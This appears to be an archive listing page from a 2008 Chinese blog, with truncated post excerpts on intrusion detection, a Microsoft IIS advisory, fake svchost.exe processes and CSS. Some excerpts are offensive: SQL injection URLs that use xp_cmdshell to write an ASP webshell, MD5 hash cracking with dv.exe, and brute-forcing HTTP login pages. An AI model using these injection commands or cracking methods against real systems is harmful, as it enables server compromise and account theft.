04 2008 档案
ASP注入详细命令40条
摘要:1、 用^转义字符来写ASP(一句话木马)文件的方法: ? http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell 'echo ^ >c:\mu.asp';-- ? echo ^ >c:\mu.asp 2、 显示SQL系统版本: ? http://192.168.1.5/display.asp?keyno=18... 阅读全文
posted @ 2008-04-30 09:48 间歇博客 阅读(560) 评论(0) 推荐(0)
入侵检测技术的基础
摘要:1. IDS(入侵检测系统)存在与发展的必然性 (1)网络安全本身的复杂性,被动式的防御方式显得力不从心。 (2)有关防火墙:网络边界的设备;自身可以被攻破;对某些攻击保护很弱;并非所有威胁均来自防火墙外部。 (3)入侵很容易:入侵教程随处可见;各种工具唾手可得 2. 入侵检测(Intrusion Detection) ●定义:通过从计算机网络或计算机系统中... 阅读全文
posted @ 2008-04-16 17:19 间歇博客 阅读(617) 评论(0) 推荐(0)
KB939373 影响IIS正常运行
摘要:安全公告号:MS07-041 漏洞名称:Microsoft Internet Information Services 中的漏洞可能允许远程执行代码 微软名称:KB939373 漏洞的影响:远程执行代码 最高严重等级:重要 建议:Microsoft 建议用户立即应用此更新。 漏洞描述:此重要安全更新可解决一个秘密报告的漏洞。 如果攻击者向 Windows XP Professional Servi... 阅读全文
posted @ 2008-04-12 11:26 间歇博客 阅读(374) 评论(0) 推荐(0)
网站DIV+CSS及搜索优化
摘要:DIV+CSS技术优势 业界越来越关注DIV+CSS的标准化设计,大到各大门户网站,小到不计其数的个人网站,在Div+CSS标准化的影响下,网页设计人员已经把这一要求作为行业标准。那么什么是Div+CSS标准?Div+CSS的标准化设计到底有什么好处? Div 全称 division 意为“区分”使用 DIV 的方法跟使用其他 tag 的方法一样。 Very excellent webmaster... 阅读全文
posted @ 2008-04-09 11:11 间歇博客 阅读(366) 评论(0) 推荐(0)
dv.exe 使用方法
摘要:我的破解办法 先下载 dv.exe 下载后 把这 工具直接保存在 C盘 不需要去点击他它! 把你要破解的 md5 密码和帐号 保存为1.txt 也保存在C盘 格式为 密码在前 帐号在后 中间隔几个空格(帐号无关紧要,你可以用那个真帐号,也可以用1,2,3...来代替 只要 破解出来后 知道 知道破的那个密码对应的那个帐号 就行) 例如: r5r312trt3556... 阅读全文
posted @ 2008-04-08 17:25 间歇博客 阅读(1584) 评论(0) 推荐(0)
MD5解密方法整理
摘要:一般来说,形如1e4dc79d489e86b2的16位或者32位密码就是经过MD5加密的,(当然也有特殊,比如DVBBS在登陆时候会先产生一个16位的随机密码,当然,这个密码还是和MD5密码的形式有点区别,相同的是都是16位的数字+字母组合 。); 这个一般来说可以用一个叫dv.exe的工具来破解。他可以破解加密前是10位以下的纯数字或者纯字母,破解纯数字的,速度超快,但是纯字母的,就慢了,当... 阅读全文
posted @ 2008-04-08 17:17 间歇博客 阅读(3686) 评论(2) 推荐(0)
Svchost.exe病毒
摘要:Svchost.exe是病毒的两种情况 1.利用假冒Svchost.exe名称的病毒程序 这种方式运行的病毒并没有直接利用真正的Svchost.exe进程,而是启动了另外一个名称同样是Svchost.exe的病毒进程,由于这个假冒的病毒进程并没有加载系统服务,它和真正的Svchost.exe进程是不同的,只需在命令行窗口中运行一下“Tasklist /svc”,如果看到哪个Svchost.ex... 阅读全文
posted @ 2008-04-05 11:36 间歇博客 阅读(3105) 评论(0) 推荐(0)
推荐一款图片处理软件《Turbo Photo》,是你处理图片得心应手,而且很简单!
摘要:推荐一款图片处理软件《Turbo Photo》 是你处理图片得心应手 而且很简单 周么帮朋友处理图片 感觉用photo或firework太麻烦了 就在网上找有没有简单的方法 果然懒有懒得好处 让我又找到了一个很好的图片处理软件Turbo Photo 我们常用的非主流图片处理软件如google旗下的Picasa acdsee等软件都不如Turbo Photo功能那么全面 如果是要... 阅读全文
posted @ 2008-04-05 10:31 间歇博客 阅读(2582) 评论(0) 推荐(0)
很酷的css定义的banner效果
摘要:Top Right Banner Style #topright { position: absolute; right: 0; top: 0; display: block; height: 125px; width: 125px; background: url(TRbanner.gif) no-repeat; text... 阅读全文
posted @ 2008-04-02 13:53 间歇博客 阅读(563) 评论(0) 推荐(0)
入侵检测技术的基础
摘要:1. IDS(入侵检测系统)存在与发展的必然性 (1)网络安全本身的复杂性,被动式的防御方式显得力不从心。 (2)有关防火墙:网络边界的设备;自身可以被攻破;对某些攻击保护很弱;并非所有威胁均来自防火墙外部。 (3)入侵很容易:入侵教程随处可见;各种工具唾手可得 2. 入侵检测(Intrusion Detection) ●定义:通过从计算机网络或计算机系统中... 阅读全文
posted @ 2008-04-02 09:52 间歇博客 阅读(651) 评论(0) 推荐(1)
暴力破解HTTP验证Web页面口令的强度
摘要:首先,你总得有像样的字典吧。去国外网站上下Wordlist吧,或者自己写个简单的程序来生成字典。如果不会写程序,呵呵呵呵,那就下载字典生成程序吧 。(不过网上下的wordlist,或者用网上下的字典生成程序生成的字典,好像都不好用) 其次,你总得有工具来运用字典干活吧。可以从网上下载工具,比如大名鼎鼎的brutus。运行时的界面如下: 500)this.width=500" bo... 阅读全文
posted @ 2008-04-01 11:36 间歇博客 阅读(860) 评论(0) 推荐(0)